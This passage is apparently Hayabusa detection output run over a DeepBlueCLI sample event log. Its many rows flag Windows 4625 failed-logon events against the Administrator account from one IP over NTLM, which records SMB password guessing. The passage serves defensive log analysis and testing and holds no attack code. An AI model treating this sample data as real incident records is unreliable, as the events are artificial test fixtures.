NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWbnppJfJ0Ll9oLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoUjizV5iXImPGTe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHNG9oylnT46IObg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LUeAisNPQULjD2t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2sB5MlRw4Ox1OWdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WaklWtKd8QByH8M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nzvyy6CUk43SVxZW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xeolvnD92qP1dJPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDvRwPbu6yQH2pEf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxKdofXKKkCLn2n6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkO9p50Q9iFolbmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p01SZCA784xmPMe2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XKaI3FHBbBXvVsES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmUk6sW8QreDIZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0w9SSWaaTX7chM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 46vgsyX5Wxn2rupf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PV8628a8GNKoFyzM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mksBFEFzkC08dB4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U6QlHT6Bp63JDehd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRj4fxcRY0Esegl6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dj6zQjZwGEBo0zNt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imfY1T2VMoaqDSUd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvPP8UYn9fLpRYl4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFTGQ5tzNI5k58cK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8Zj3g1WiTLx8OlJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x2Lr6j8Qt4xEmZZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BeDRsguCovO47lKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KqrDyaFTewMPSzD9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nBVMAki1Ghpknf6p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXKhNUmBUQBTyeNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1g9TVwsweaBfZgE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kWymb6ucohaBB60b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjL0zwlZofVuWhGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxsdzkJdnaZs5eKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PR6EpKvbqMeoQlKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZ3LMTtsVNI1gRO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75bNeXwYSZPhJdJ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lH6TVXSqJb1qLd3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edDWye6c2UhKznR6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxKUl1lynGY1ectn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vI5yUgukPBVRorJI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmR29QcBKMGVQ8rB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7luV5GfiT0v0h7D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yA7pIDFgQbLIInqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 84g2gO0253Ut4O1O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DRkFX9WTAhBZ8jc8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuoQAi4k3XZPaf4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KjKMhCnbR0uFT0av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lfwqPB0AgTfIOt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mJuG26pQzdjUQael : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXwEziYTA3DkkFVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CHr6dirvkT8B9ZVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B5eSMLiF4BsfY3xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64ISDuFRhR6cFYVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcprXytyuBw380XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxfQWiSIhZYxwNjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FcL982boDelzeyzK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBAAjRdaR8U0tqt7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EmqUjcltAW6StHQJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 129Rp3HCmRVRXw3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jpIIQP2oWEF51EBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HREGh5ppEkLAuEob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVkpQvotEMfM8R0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm6uHEy5RJJBJ6FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPTyAkYjcIlko5lu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OjlRoo9Sot4Fx4Th : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XslY26kw2aBw19D8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1404fakprYeqGiNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2VfIjtBcXCRlOjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPztyX4J9NV8EldT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 07flrrzWgsVBYaN2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vgkqkC1VvznGxR6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hMn6yDMLgLChJTL6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uSTokOJ31Tj0bLXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyRifC46GrNpTA4x : IP Address: 192.168.198.149 : AuthPackage: 